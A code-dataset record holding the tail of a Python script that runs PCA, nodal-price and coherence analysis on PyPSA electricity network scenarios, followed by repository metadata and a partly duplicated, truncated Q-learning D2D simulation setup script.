    barMatrixTransmissionElec.append(varianceExplainedElec)
constraints = ["Zero", "Current", "2x Current", "4x Current", "6x Current"]
# NOTE(review): unlike the CO2 bar plot above, `title` and `suptitleElec` are
# not blanked out here — possibly an oversight, so the figure gets a title.
title = "Number of PC describing variance of network as a function of transmission constraint"
xlabel = "Transmission constraint"
suptitleElec = ("Electricity Mismatch - " + file[12:-14])
fig = BAR(barMatrixTransmissionElec, 7, filename_trans, constraints, title, xlabel, suptitleElec, fontsize=18, figsize=[6, 3], ncol=4, rotation=-17.5, bbox=(0.5,-0.28))
titleBarTransmissionElec = (file[12:-14] + " - Bar Trans Elec Mismatch")
SavePlot(fig, path, titleBarTransmissionElec)
# ------------------ Change in contribution and response CO2 ----------------------- #
# For every CO2 scenario: recompute the mismatch PCA and collect the projected
# contribution, response and covariance terms for the "change" plots below.
# Variable to store lambda values
lambdaContributionElec = []
lambdaResponseElec = []
lambdaCovarianceElec = []
# Name of file (must be in correct folder location)
filename_CO2 = ["postnetwork-elec_only_0.125_0.6.h5",
                "postnetwork-elec_only_0.125_0.5.h5",
                "postnetwork-elec_only_0.125_0.4.h5",
                "postnetwork-elec_only_0.125_0.3.h5",
                "postnetwork-elec_only_0.125_0.2.h5",
                "postnetwork-elec_only_0.125_0.1.h5",
                "postnetwork-elec_only_0.125_0.05.h5"]
for file in filename_CO2:
    # --------------------------- Electricity -------------------------------#
    # Network
    network = pypsa.Network(directory + file)
    # Get the names of the data (2-letter country codes)
    dataNames = network.buses.index.str.slice(0,2).unique()
    # Get time stamps
    timeIndex = network.loads_t.p_set.index
    # Electricity load for each country
    loadElec = network.loads_t.p_set[dataNames]
    # Solar PV generation
    generationSolar = network.generators_t.p[dataNames + " solar"]
    generationSolar.columns = generationSolar.columns.str.slice(0,2)
    # Onshore wind generation
    generationOnwind = network.generators_t.p[[country for country in network.generators_t.p.columns if "onwind" in country]].groupby(network.generators.bus.str.slice(0,2),axis=1).sum()
    # Offshore wind generation
    # Because offwind is only for 21 countries, additional methods have to be implemented to make it at 8760 x 30 matrix
    # Create empty array of 8760 x 30, add the offwind generation and remove 'NaN' values.
    generationOffwind = pd.DataFrame(np.zeros([8760,30]),index=timeIndex, columns=dataNames)
    generationOffwind += network.generators_t.p[[country for country in network.generators_t.p.columns if "offwind" in country]].groupby(network.generators.bus.str.slice(0,2),axis=1).sum()
    generationOffwind = generationOffwind.replace(np.nan,0)
    # RoR generations
    # Because RoR is only for 27 countries, additional methods have to be implemented to make it at 8760 x 30 matrix
    # Create empty array of 8760 x 30, add the RoR generation and remove 'NaN' values.
    generationRoR = pd.DataFrame(np.zeros([8760,30]),index=timeIndex, columns=dataNames)
    generationRoR += network.generators_t.p[[country for country in network.generators_t.p.columns if "ror" in country]].groupby(network.generators.bus.str.slice(0,2),axis=1).sum()
    generationRoR = generationRoR.replace(np.nan,0)
    # Combined generation for electricity
    generationElec = generationSolar + generationOnwind + generationOffwind + generationRoR
    # Mismatch electricity
    mismatchElec = generationElec - loadElec
    # PCA on mismatch for electricity
    eigenValuesElec, eigenVectorsElec, varianceExplainedElec, normConstElec, TElec = PCA(mismatchElec)
    # Contribution Elec
    dircConElec = Contribution(network, "elec")
    lambdaCollectedConElec = ConValueGenerator(normConstElec, dircConElec, eigenVectorsElec)
    lambdaContributionElec.append(lambdaCollectedConElec)
    # Response Elec
    dircResElec = ElecResponse(network,True)
    lambdaCollectedResElec = ConValueGenerator(normConstElec, dircResElec, eigenVectorsElec)
    lambdaResponseElec.append(lambdaCollectedResElec)
    # Covariance Elec
    covMatrix = CovValueGenerator(dircConElec, dircResElec , True, normConstElec, eigenVectorsElec)
    lambdaCovarianceElec.append(covMatrix.T)
#%%
# Re-import the helper functions so this notebook-style cell can be re-run on
# its own after editing functions_file (interactive workflow).
from functions_file import *
# Output directories for the "change as a function of CO2 constraint" figures.
# (Cleanup: removed eight dead `figtitle = ...` assignments that were never
# passed to any plot call, and fixed the `pathContibution` spelling.)
pathContribution = figurePath + "Mismatch\\Change in Contribution\\"
pathResponse = figurePath + "Mismatch\\Change in Response\\"
pathCovariance = figurePath + "Mismatch\\Change in Covariance\\"
# Change in electricity contribution across CO2 constraints (2 PCs, rotated)
fig = ChangeContributionElec(lambdaContributionElec, rotate=True, PC=2)
saveTitle = file[12:-14] + " - Change in elec cont (CO2)"
SavePlot(fig, pathContribution, saveTitle)
# Same with 6 PCs ("app" variant)
fig = ChangeContributionElec(lambdaContributionElec, rotate=False, PC=6)
saveTitle = file[12:-14] + " - Change in elec cont app (CO2)"
SavePlot(fig, pathContribution, saveTitle)
# Change in electricity response (2 PCs, rotated)
fig = ChangeResponseElec(lambdaResponseElec, rotate=True, PC=2)
saveTitle = file[12:-14] + " - Change in elec response (CO2)"
SavePlot(fig, pathResponse, saveTitle)
# Same with 6 PCs ("app" variant)
fig = ChangeResponseElec(lambdaResponseElec, rotate=False, PC=6)
saveTitle = file[12:-14] + " - Change in elec response app (CO2)"
SavePlot(fig, pathResponse, saveTitle)
# Change in electricity covariance response (2 PCs, rotated)
fig = ChangeResponseCov(lambdaResponseElec, rotate=True, PC=2)
saveTitle = file[12:-14] + " - Change in elec cov response (CO2)"
SavePlot(fig, pathResponse, saveTitle)
# Same with 6 PCs ("app" variant)
fig = ChangeResponseCov(lambdaResponseElec, rotate=False, PC=6)
saveTitle = file[12:-14] + " - Change in elec cov response app (CO2)"
SavePlot(fig, pathResponse, saveTitle)
# Change in covariance between mismatch and response (2 PCs, rotated)
fig = ChangeCovariance(lambdaCovarianceElec, collectTerms=True, rotate=True, PC=2)
saveTitle = file[12:-14] + " - Change in elec covariance (CO2)"
SavePlot(fig, pathCovariance, saveTitle)
# Same with 6 PCs ("app" variant)
fig = ChangeCovariance(lambdaCovarianceElec, collectTerms=True, rotate=False, PC=6)
saveTitle = file[12:-14] + " - Change in elec covariance app (CO2)"
SavePlot(fig, pathCovariance, saveTitle)
#%%
# ------------------ Change in contribution and response transmission ----------------------- #
# For every transmission scenario: recompute the mismatch PCA and collect the
# projected contribution, response and covariance terms for the plots below.
# Variable to store lambda values
lambdaContributionElec = []
lambdaResponseElec = []
lambdaCovarianceElec = []
# Name of file (must be in correct folder location)
filename_trans = ["postnetwork-elec_only_0_0.05.h5",
                  "postnetwork-elec_only_0.0625_0.05.h5",
                  "postnetwork-elec_only_0.125_0.05.h5",
                  "postnetwork-elec_only_0.25_0.05.h5",
                  "postnetwork-elec_only_0.375_0.05.h5"]
for file in filename_trans:
    # --------------------------- Electricity -------------------------------#
    # Network
    network = pypsa.Network(directory + file)
    # Get the names of the data (2-letter country codes)
    dataNames = network.buses.index.str.slice(0,2).unique()
    # Get time stamps
    timeIndex = network.loads_t.p_set.index
    # Electricity load for each country
    loadElec = network.loads_t.p_set[dataNames]
    # Solar PV generation
    generationSolar = network.generators_t.p[dataNames + " solar"]
    generationSolar.columns = generationSolar.columns.str.slice(0,2)
    # Onshore wind generation
    generationOnwind = network.generators_t.p[[country for country in network.generators_t.p.columns if "onwind" in country]].groupby(network.generators.bus.str.slice(0,2),axis=1).sum()
    # Offshore wind generation
    # Because offwind is only for 21 countries, additional methods have to be implemented to make it at 8760 x 30 matrix
    # Create empty array of 8760 x 30, add the offwind generation and remove 'NaN' values.
    generationOffwind = pd.DataFrame(np.zeros([8760,30]),index=timeIndex, columns=dataNames)
    generationOffwind += network.generators_t.p[[country for country in network.generators_t.p.columns if "offwind" in country]].groupby(network.generators.bus.str.slice(0,2),axis=1).sum()
    generationOffwind = generationOffwind.replace(np.nan,0)
    # RoR generations
    # Because RoR is only for 27 countries, additional methods have to be implemented to make it at 8760 x 30 matrix
    # Create empty array of 8760 x 30, add the RoR generation and remove 'NaN' values.
    generationRoR = pd.DataFrame(np.zeros([8760,30]),index=timeIndex, columns=dataNames)
    generationRoR += network.generators_t.p[[country for country in network.generators_t.p.columns if "ror" in country]].groupby(network.generators.bus.str.slice(0,2),axis=1).sum()
    generationRoR = generationRoR.replace(np.nan,0)
    # Combined generation for electricity
    generationElec = generationSolar + generationOnwind + generationOffwind + generationRoR
    # Mismatch electricity
    mismatchElec = generationElec - loadElec
    # PCA on mismatch for electricity
    eigenValuesElec, eigenVectorsElec, varianceExplainedElec, normConstElec, TElec = PCA(mismatchElec)
    # Contribution Elec
    dircConElec = Contribution(network, "elec")
    lambdaCollectedConElec = ConValueGenerator(normConstElec, dircConElec, eigenVectorsElec)
    lambdaContributionElec.append(lambdaCollectedConElec)
    # Response Elec
    dircResElec = ElecResponse(network,True)
    lambdaCollectedResElec = ConValueGenerator(normConstElec, dircResElec, eigenVectorsElec)
    lambdaResponseElec.append(lambdaCollectedResElec)
    # Covariance Elec
    covMatrix = CovValueGenerator(dircConElec, dircResElec , True, normConstElec,eigenVectorsElec)
    lambdaCovarianceElec.append(covMatrix.T)
# Output directories for the "change as a function of transmission constraint"
# figures. (Cleanup: removed eight dead `figtitle = ...` assignments that were
# never passed to any plot call, and fixed the `pathContibution` spelling.)
pathContribution = figurePath + "Mismatch\\Change in Contribution\\"
pathResponse = figurePath + "Mismatch\\Change in Response\\"
pathCovariance = figurePath + "Mismatch\\Change in Covariance\\"
# Change in electricity contribution across transmission constraints (2 PCs, rotated)
fig = ChangeContributionElec(lambdaContributionElec, rotate=True, PC=2)
saveTitle = file[12:-14] + " - Change in elec cont (trans)"
SavePlot(fig, pathContribution, saveTitle)
# Same with 6 PCs ("app" variant)
fig = ChangeContributionElec(lambdaContributionElec, rotate=False, PC=6)
saveTitle = file[12:-14] + " - Change in elec cont app (trans)"
SavePlot(fig, pathContribution, saveTitle)
# Change in electricity response (2 PCs, rotated)
fig = ChangeResponseElec(lambdaResponseElec, rotate=True, PC=2)
saveTitle = file[12:-14] + " - Change in elec response (trans)"
SavePlot(fig, pathResponse, saveTitle)
# Same with 6 PCs ("app" variant)
fig = ChangeResponseElec(lambdaResponseElec, rotate=False, PC=6)
saveTitle = file[12:-14] + " - Change in elec response app (trans)"
SavePlot(fig, pathResponse, saveTitle)
# Change in electricity covariance response (2 PCs, rotated)
fig = ChangeResponseCov(lambdaResponseElec, rotate=True, PC=2)
saveTitle = file[12:-14] + " - Change in elec cov response (trans)"
SavePlot(fig, pathResponse, saveTitle)
# Same with 6 PCs ("app" variant)
fig = ChangeResponseCov(lambdaResponseElec, rotate=False, PC=6)
saveTitle = file[12:-14] + " - Change in elec cov response app (trans)"
SavePlot(fig, pathResponse, saveTitle)
# Change in covariance between mismatch and response (2 PCs, rotated)
fig = ChangeCovariance(lambdaCovarianceElec, collectTerms=True, rotate=True, PC=2)
saveTitle = file[12:-14] + " - Change in elec covariance (trans)"
SavePlot(fig, pathCovariance, saveTitle)
# Same with 6 PCs ("app" variant)
fig = ChangeCovariance(lambdaCovarianceElec, collectTerms=True, rotate=False, PC=6)
saveTitle = file[12:-14] + " - Change in elec covariance app (trans)"
SavePlot(fig, pathCovariance, saveTitle)
#%%
##############################################################################
##############################################################################
################################ NODAL PRICE #################################
##############################################################################
##############################################################################
# PCA of the hourly nodal electricity prices for the default scenario.
# File name
file = "postnetwork-elec_only_0.125_0.05.h5"
# Import network
network = pypsa.Network(directory+file)
# Get the names of the data (2-letter country codes)
dataNames = network.buses.index.str.slice(0,2).unique()
# ----------------------- Map PC Plot (Elec + Heat) --------------------#
# Path to save plots
path = figurePath + "Nodal Price\\Map PC\\"
# --- Elec ---
# Prices for electricity for each country, filtered by FilterPrice with a
# 465 EUR/MWh limit (an older note here said "1000 EUR/MWh"; the code uses 465)
priceElec = FilterPrice(network.buses_t.marginal_price[dataNames], 465)
# PCA on nodal prices for electricity
eigenValuesElec, eigenVectorsElec, varianceExplainedElec, normConstElec, TElec = PCA(priceElec)
# Plot map PC for electricity nodal prices
titlePlotElec = "Nodal price for electricity only"
for i in np.arange(6):
    fig = MAP(eigenVectorsElec, eigenValuesElec, dataNames, (i + 1),size="medium")#, titlePlotElec, titleFileName)
    title = (file[12:-3] + " - Map PC Elec NP (lambda " + str(i+1) + ")")
    SavePlot(fig, path, title)
# ------------------------ FFT Plot (Elec + Heat) -----------------------#
# Path to save FFT plots
path = figurePath + "Nodal Price\\FFT\\"
# --- Elec ---
file_name = "Electricity Nodal Price - " + file
for i in np.arange(6):
    fig = FFTPlot(TElec.T, varianceExplainedElec, PC_NO = i+1, title=file_name)
    title = (file[12:-3] + " - FFT Elec NP (lambda " + str(i+1) + ")")
    SavePlot(fig, path, title)
# ----------------------- Seasonal Plot (Elec + Heat) ------------------------#
# Path to save seasonal plots
path = figurePath + "Nodal Price\\Seasonal\\"
# --- Elec ---
# NOTE(review): `timeIndex` is not recomputed in this section — it still holds
# the snapshots of the network loaded previously (assumed identical).
file_name = "Electricity Nodal Price - " + file
for i in np.arange(6):
    fig = seasonPlot(TElec, timeIndex, PC_NO=(i+1), PC_amount=6, title=file_name)
    title = (file[12:-3] + " - Seasonal Plot Elec NP (lambda " + str(i+1) + ")")
    SavePlot(fig, path, title)
# -------------------- FFT + Seasonal Plot (Elec) ---------------------#
# Path to save seasonal plots
path = figurePath + "Nodal Price\\Timeseries\\"
# --- Elec ---
file_name = "Electricity Nodal Price - " + file
for i in np.arange(6):
    fig = FFTseasonPlot(TElec, timeIndex, varianceExplainedElec, PC_NO=(i+1), PC_amount=6,dpi=200)
    title = (file[12:-3] + " - Timeseries Plot Elec NP (lambda " + str(i+1) + ")")
    SavePlot(fig, path, title)
# ------------------- PC1 and PC2 combined plot (Elec) -------------------- #
# Path to save contribution plots
path = figurePath + "Nodal Price\\Combined Plot\\"
# --- Elec ---
# NOTE(review): the contribution/response/covariance arguments below were
# computed for the *mismatch* in earlier sections, not for nodal prices; with
# PCType="withoutProjection" they are presumably unused — confirm.
fig = PC1and2Plotter(TElec, timeIndex, [1,2], eigenValuesElec, lambdaCollectedConElec, lambdaCollectedResElec, covMatrixElec,PCType="withoutProjection")#,suptitle=("Electricity Mismatch - " + file[12:-3]),dpi=200)
title = (file[12:-3] + " - Combined Plot Elec NP (lambda 1 & 2)")
SavePlot(fig, path, title)
#%%
# ---------------------- Bar plot CO2 constraint --------------------------- #
# Path to save bar plots
path = figurePath + "Nodal Price\\Bar\\"
# Post-network files to sweep over tightening CO2 constraints
# (40% ... 95% reduction); must be in correct folder location.
filename_CO2 = ["postnetwork-elec_only_0.125_0.6.h5",
                "postnetwork-elec_only_0.125_0.5.h5",
                "postnetwork-elec_only_0.125_0.4.h5",
                "postnetwork-elec_only_0.125_0.3.h5",
                "postnetwork-elec_only_0.125_0.2.h5",
                "postnetwork-elec_only_0.125_0.1.h5",
                "postnetwork-elec_only_0.125_0.05.h5"]
# Variance explained by the nodal-price principal components, one entry per network
barMatrixCO2Elec = []
# Nodal-price mean and quantile statistics, one entry per network
meanPriceElec = []
stdMeanPriceElec = []  # NOTE(review): never appended to in this section - appears unused
quantileMeanPriceElec = []
quantileMinPriceElec = []
for file in filename_CO2:
    # Network
    network = pypsa.Network(directory + file)
    # Get the names of the data (2-letter country codes)
    dataNames = network.buses.index.str.slice(0,2).unique()
    # --- Elec ---
    # Prices for electricity for each country (extremes capped by FilterPrice at 465)
    priceElec = FilterPrice(network.buses_t.marginal_price[dataNames], 465)
    # PCA on nodal prices for electricity
    eigenValuesElec, eigenVectorsElec, varianceExplainedElec, normConstElec, TElec = PCA(priceElec)
    # Append value to matrix
    barMatrixCO2Elec.append(varianceExplainedElec)
    # ----------------------- NP Mean (Elec) --------------------#
    # --- Elec ---
    # Average (over countries) of each country's minimum and mean price
    minPrice = priceElec.min().mean()
    meanPrice = priceElec.mean().mean()
    # append min and mean to matrix
    meanPriceElec.append([minPrice, meanPrice])
    # ----------------------- NP Quantile (Elec) --------------------#
    # --- Elec ---
    # 5/25/75/95% quantiles across countries of the min and mean prices
    quantileMinPrice = np.quantile(priceElec.min(),[0.05,0.25,0.75,0.95])
    quantileMeanPrice = np.quantile(priceElec.mean(),[0.05,0.25,0.75,0.95])
    # append quantiles to matrices
    quantileMeanPriceElec.append(quantileMeanPrice)
    quantileMinPriceElec.append(quantileMinPrice)
constraints = ["40%", "50%", "60%", "70%", "80%", "90%", "95%"]
title = "" #"Number of PC describing variance of network as a function of $CO_{2}$ constraint"
xlabel = "" #"$CO_{2}$ constraint"
suptitleElec = "" #("Electricity Nodal Price - " + file[12:-14])
fig = BAR(barMatrixCO2Elec, 7, filename_CO2, constraints, title, xlabel, suptitleElec, fontsize=18, figsize=[6, 3], ncol=4, bbox=(0.5,-0.28))
titleBarCO2Elec = (file[12:-14] + " - Bar CO2 Elec NP")
SavePlot(fig, path, titleBarCO2Elec)
# ----------------------- Price evolution (Elec) --------------------#
path = figurePath + "Nodal Price\\Price Evolution\\"
title = "" #("Electricity Nodal Price Evolution - " + file[12:-14])
fig = PriceEvolution(meanPriceElec,quantileMeanPriceElec, quantileMinPriceElec, networktype="green", title=title, figsize=[6,3], fontsize=16)
title = (file[12:-14] + " - Elec NP CO2 Evolution")
SavePlot(fig, path, title)
# ------------------ Bar plot Transmission constraint ----------------------- #
# Path
path = figurePath + "Nodal Price\\Bar\\"
# Post-network files to sweep over increasing transmission capacity
# (zero, current, 2x, 4x, 6x); must be in correct folder location.
filename_trans = ["postnetwork-elec_only_0_0.05.h5",
                  "postnetwork-elec_only_0.0625_0.05.h5",
                  "postnetwork-elec_only_0.125_0.05.h5",
                  "postnetwork-elec_only_0.25_0.05.h5",
                  "postnetwork-elec_only_0.375_0.05.h5"]
# Variance explained by the nodal-price principal components, one entry per network
barMatrixTransmissionElec = []
# Nodal-price mean and quantile statistics, one entry per network
meanPriceElec = []
quantileMeanPriceElec = []
quantileMinPriceElec = []
for file in filename_trans:
    # Network
    network = pypsa.Network(directory + file)
    # Get the names of the data (2-letter country codes)
    dataNames = network.buses.index.str.slice(0,2).unique()
    # --- Elec ---
    # Prices for electricity for each country (extremes capped by FilterPrice at 465)
    priceElec = FilterPrice(network.buses_t.marginal_price[dataNames], 465)
    # PCA on nodal prices for electricity
    eigenValuesElec, eigenVectorsElec, varianceExplainedElec, normConstElec, TElec = PCA(priceElec)
    # Append value to matrix
    barMatrixTransmissionElec.append(varianceExplainedElec)
    # ----------------------- NP Mean (Elec) --------------------#
    # --- Elec ---
    # Average (over countries) of each country's minimum and mean price
    minPrice = priceElec.min().mean()
    meanPrice = priceElec.mean().mean()
    # append min and mean to matrix
    meanPriceElec.append([minPrice, meanPrice])
    # ----------------------- NP Quantile (Elec) --------------------#
    # --- Elec ---
    # 5/25/75/95% quantiles across countries of the min and mean prices
    quantileMinPrice = np.quantile(priceElec.min(),[0.05,0.25,0.75,0.95])
    quantileMeanPrice = np.quantile(priceElec.mean(),[0.05,0.25,0.75,0.95])
    # append quantiles to matrices
    quantileMeanPriceElec.append(quantileMeanPrice)
    quantileMinPriceElec.append(quantileMinPrice)
# ----------------------- Bar plot (Elec) --------------------#
constraints = ["Zero", "Current", "2x Current", "4x Current", "6x Current"]
title = "" #"Number of PC describing variance of network as a function of transmission constraint"
xlabel = "" #"Transmission constraint"
suptitleElec = "" #("Electricity Nodal Price - " + file[12:-14])
fig = BAR(barMatrixTransmissionElec, 7, filename_trans, constraints, title, xlabel, suptitleElec, fontsize=18, figsize=[6, 3], ncol=4, rotation=-17.5, bbox=(0.5,-0.28))
titleBarTransmissionElec = (file[12:-14] + " - Bar Trans Elec NP")
SavePlot(fig, path, titleBarTransmissionElec)
# ----------------------- Price evolution (Elec) --------------------#
path = figurePath + "Nodal Price\\Price Evolution\\"
title = "" #("Electricity Nodal Price Evolution - " + file[12:-14])
fig = PriceEvolution(meanPriceElec,quantileMeanPriceElec, quantileMinPriceElec, networktype="green", title=title, figsize=[6,3.2], fontsize=16)
title = (file[12:-14] + " - Elec NP Trans Evolution")
SavePlot(fig, path, title)
#%%
##############################################################################
##############################################################################
################################# Coherence ##################################
##############################################################################
##############################################################################
# -------------------- Coherence Plot (Elec + Heat) ---------------------#
# File name
file = "postnetwork-elec_only_0.125_0.05.h5"
# Import network
network = pypsa.Network(directory+file)
# Get the names of the data (2-letter country codes)
dataNames = network.buses.index.str.slice(0,2).unique()
# Get time stamps
timeIndex = network.loads_t.p_set.index
# Path to save contribution plots
path = figurePath + "Coherence\\"
# --- Elec ---
# Electricity load for each country
loadElec = network.loads_t.p_set[dataNames]
# Solar PV generation
generationSolar = network.generators_t.p[dataNames + " solar"]
generationSolar.columns = generationSolar.columns.str.slice(0,2)
# Onshore wind generation (generators summed per country)
generationOnwind = network.generators_t.p[[country for country in network.generators_t.p.columns if "onwind" in country]].groupby(network.generators.bus.str.slice(0,2),axis=1).sum()
# Offshore wind generation
# Because offwind is only for 21 countries, additional methods have to be implemented to make it at 8760 x 30 matrix
# Create empty array of 8760 x 30, add the offwind generation and remove 'NaN' values.
generationOffwind = pd.DataFrame(np.zeros([8760,30]),index=timeIndex, columns=dataNames)
generationOffwind += network.generators_t.p[[country for country in network.generators_t.p.columns if "offwind" in country]].groupby(network.generators.bus.str.slice(0,2),axis=1).sum()
generationOffwind = generationOffwind.replace(np.nan,0)
# RoR (run-of-river hydro) generations
# Because RoR is only for 27 countries, additional methods have to be implemented to make it at 8760 x 30 matrix
# Create empty array of 8760 x 30, add the RoR generation and remove 'NaN' values.
generationRoR = pd.DataFrame(np.zeros([8760,30]),index=timeIndex, columns=dataNames)
generationRoR += network.generators_t.p[[country for country in network.generators_t.p.columns if "ror" in country]].groupby(network.generators.bus.str.slice(0,2),axis=1).sum()
generationRoR = generationRoR.replace(np.nan,0)
# Combined generation for electricity
generationElec = generationSolar + generationOnwind + generationOffwind + generationRoR
# Mismatch electricity: generation minus load, per country and hour
mismatchElec = generationElec - loadElec
# Prices for each country (extremes capped by FilterPrice at 465)
priceElec = FilterPrice(network.buses_t.marginal_price[dataNames], 465)
# Coherence between prices and mismatch (three coherence measures c1..c3)
c1Elec, c2Elec, c3Elec = Coherence(mismatchElec, priceElec)
# Plot properties
title1 = "" #"Coherence 1: Electricity mismatch and nodal price"
title2 = "" #"Coherence 2: Electricity mismatch and nodal price"
title3 = "" #"Coherence 3: Electricity mismatch and nodal price"
xlabel = "Electricity Mismatch"
ylabel="Electricity Prices"
noX = 6
noY = 6
# Note: c3 lives in [-1, 1], while c1 and c2 live in [0, 1] (see dataRange)
fig1 = CoherencePlot(dataMatrix=c1Elec.T, รผbertitle="", title=title1, xlabel=xlabel, ylabel=ylabel, noX=noX, noY=noY, dataRange=[0,1])
fig2 = CoherencePlot(dataMatrix=c2Elec.T, รผbertitle="", title=title2, xlabel=xlabel, ylabel=ylabel, noX=noX, noY=noY, dataRange=[0,1])
fig3 = CoherencePlot(dataMatrix=c3Elec.T, รผbertitle="", title=title3, xlabel=xlabel, ylabel=ylabel, noX=noX, noY=noY, dataRange=[-1,1])
SavePlot(fig1, path, title = (file[12:-3] + " - C1 elec mismatch and ENP"))
SavePlot(fig2, path, title = (file[12:-3] + " - C2 elec mismatch and ENP"))
SavePlot(fig3, path, title = (file[12:-3] + " - C3 elec mismatch and ENP"))
# Combined Plot
fig = CoherencePlotCombined(c1Elec.T, c2Elec.T, c3Elec.T, xlabel=xlabel, ylabel=ylabel)
SavePlot(fig, path, title = (file[12:-3] + " - C123 combined elec mismatch and ENP"))
# Stop the wall-clock timer and report total runtime (t0 was started
# at the top of the script).
t1 = time.time()
total_time = round(t1 - t0)
# Split the elapsed whole seconds into minutes and leftover seconds.
total_time_min, total_time_sec = divmod(total_time, 60)
print("\n \nThe code is now done running. It took %s min and %s sec." % (total_time_min, total_time_sec))
| 0 | 0 | 0 |
ba87651683190064a49de123288bc017d6c365cd | 4,017 | py | Python | scratch/scratch5.py | lbaiao/sys-simulator-2 | 94f00d43309fe7b56dac5099bd4024695ba317b6 | [
"MIT"
] | 1 | 2020-06-14T13:50:28.000Z | 2020-06-14T13:50:28.000Z | scratch/scratch5.py | lbaiao/sys-simulator-2 | 94f00d43309fe7b56dac5099bd4024695ba317b6 | [
"MIT"
] | null | null | null | scratch/scratch5.py | lbaiao/sys-simulator-2 | 94f00d43309fe7b56dac5099bd4024695ba317b6 | [
"MIT"
] | null | null | null | # Similar to scratch3, but with the BAN channel
from sys_simulator.channels import BANChannel
from sys_simulator import general as gen
from sys_simulator.pathloss import pathloss_bs_users
from sys_simulator.plots import plot_positions_actions_pie
from sys_simulator.q_learning.environments.completeEnvironment5 \
import CompleteEnvironment5
from sys_simulator.q_learning.agents.agent import Agent
from sys_simulator.q_learning.rewards import dis_reward_tensor2
from sys_simulator.parameters.parameters \
import EnvironmentParameters, TrainingParameters, DQNAgentParameters
from matplotlib import pyplot as plt
import os
import torch
import numpy as np
import math
n_mues = 1 # number of mues
n_d2d = 2 # number of d2d pairs
n_rb = n_mues # number of RBs
bs_radius = 500 # bs radius in m
rb_bandwidth = 180*1e3 # rb bandwidth in Hz
d2d_pair_distance = 50 # d2d pair distance in m
p_max = 23 # max tx power in dBm
noise_power = -116 # noise power per RB in dBm
bs_gain = 17 # macro bs antenna gain in dBi
user_gain = 4 # user antenna gain in dBi
sinr_threshold_mue = 6 # true mue sinr threshold in dB
mue_margin = .5e4
# conversions from dB to pow
p_max = p_max - 30
p_max = gen.db_to_power(p_max)
noise_power = noise_power - 30
noise_power = gen.db_to_power(noise_power)
bs_gain = gen.db_to_power(bs_gain)
user_gain = gen.db_to_power(user_gain)
sinr_threshold_mue = gen.db_to_power(sinr_threshold_mue)
# q-learning parameters
STEPS_PER_EPISODE = 4000
EPSILON_MIN = 0.01
EPSILON_DECAY = 100 * EPSILON_MIN / STEPS_PER_EPISODE
MAX_NUM_EPISODES = int(1.2/EPSILON_DECAY)
MAX_NUMBER_OF_AGENTS = 20
ALPHA = 0.05 # Learning rate
GAMMA = 0.98 # Discount factor
C = 80 # C constant for the improved reward function
TARGET_UPDATE = 10
REPLAY_MEMORY_SIZE = 10000
BATCH_SIZE = 128
# more parameters
cwd = os.getcwd()
# params objects
env_params = EnvironmentParameters(
rb_bandwidth, d2d_pair_distance, p_max, noise_power,
bs_gain, user_gain, sinr_threshold_mue, n_mues,
n_d2d, n_rb, bs_radius, c_param=C, mue_margin=mue_margin
)
train_params = TrainingParameters(MAX_NUM_EPISODES, STEPS_PER_EPISODE)
agent_params = DQNAgentParameters(
EPSILON_MIN, EPSILON_DECAY, 1,
REPLAY_MEMORY_SIZE, BATCH_SIZE, GAMMA
)
# actions, rewards, environment, agent
actions = torch.tensor([i*0.82*p_max/5/1000 for i in range(5)])
channel = BANChannel()
env = CompleteEnvironment5(env_params, dis_reward_tensor2, channel)
pairs_positions = [
(250, 0),
(-250, 0),
(0, 250),
(0, -250)
]
mue_position = (500 / math.sqrt(2), 500 / math.sqrt(2))
tx_powers_indexes = [
4, 4, 4, 4
]
# actions = [i*0.82*p_max/5/1000 for i in range(5)] # best result
actions = [i for i in range(5)] # best result
n_agents = len(pairs_positions)
| 34.930435 | 73 | 0.731641 | # Similar to scratch3, but with the BAN channel
from sys_simulator.channels import BANChannel
from sys_simulator import general as gen
from sys_simulator.pathloss import pathloss_bs_users
from sys_simulator.plots import plot_positions_actions_pie
from sys_simulator.q_learning.environments.completeEnvironment5 \
import CompleteEnvironment5
from sys_simulator.q_learning.agents.agent import Agent
from sys_simulator.q_learning.rewards import dis_reward_tensor2
from sys_simulator.parameters.parameters \
import EnvironmentParameters, TrainingParameters, DQNAgentParameters
from matplotlib import pyplot as plt
import os
import torch
import numpy as np
import math
# --- Scenario size ---
n_mues = 1  # number of mues
n_d2d = 2  # number of d2d pairs
n_rb = n_mues  # number of RBs
bs_radius = 500  # bs radius in m
# --- Radio parameters ---
rb_bandwidth = 180*1e3  # rb bandwidth in Hz
d2d_pair_distance = 50  # d2d pair distance in m
p_max = 23  # max tx power in dBm
noise_power = -116  # noise power per RB in dBm
bs_gain = 17  # macro bs antenna gain in dBi
user_gain = 4  # user antenna gain in dBi
sinr_threshold_mue = 6  # true mue sinr threshold in dB
mue_margin = .5e4  # NOTE(review): units unclear - presumably a linear-scale MUE margin; verify
# conversions from dB to pow (the -30 shifts dBm to dBW before db_to_power)
p_max = p_max - 30
p_max = gen.db_to_power(p_max)
noise_power = noise_power - 30
noise_power = gen.db_to_power(noise_power)
bs_gain = gen.db_to_power(bs_gain)
user_gain = gen.db_to_power(user_gain)
sinr_threshold_mue = gen.db_to_power(sinr_threshold_mue)
# q-learning parameters
STEPS_PER_EPISODE = 4000
EPSILON_MIN = 0.01
EPSILON_DECAY = 100 * EPSILON_MIN / STEPS_PER_EPISODE
MAX_NUM_EPISODES = int(1.2/EPSILON_DECAY)
MAX_NUMBER_OF_AGENTS = 20
ALPHA = 0.05  # Learning rate
GAMMA = 0.98  # Discount factor
C = 80  # C constant for the improved reward function
TARGET_UPDATE = 10
REPLAY_MEMORY_SIZE = 10000
BATCH_SIZE = 128
# more parameters
cwd = os.getcwd()
# params objects
env_params = EnvironmentParameters(
    rb_bandwidth, d2d_pair_distance, p_max, noise_power,
    bs_gain, user_gain, sinr_threshold_mue, n_mues,
    n_d2d, n_rb, bs_radius, c_param=C, mue_margin=mue_margin
)
train_params = TrainingParameters(MAX_NUM_EPISODES, STEPS_PER_EPISODE)
agent_params = DQNAgentParameters(
    EPSILON_MIN, EPSILON_DECAY, 1,
    REPLAY_MEMORY_SIZE, BATCH_SIZE, GAMMA
)
# actions, rewards, environment, agent
# NOTE(review): this tensor of power levels is overwritten by the plain
# index list a few lines below, so it is effectively unused.
actions = torch.tensor([i*0.82*p_max/5/1000 for i in range(5)])
channel = BANChannel()
env = CompleteEnvironment5(env_params, dis_reward_tensor2, channel)
# Fixed D2D transmitter positions in metres, relative to the BS at the origin.
# NOTE(review): n_d2d above is 2 but four pairs are placed here - verify which wins.
pairs_positions = [
    (250, 0),
    (-250, 0),
    (0, 250),
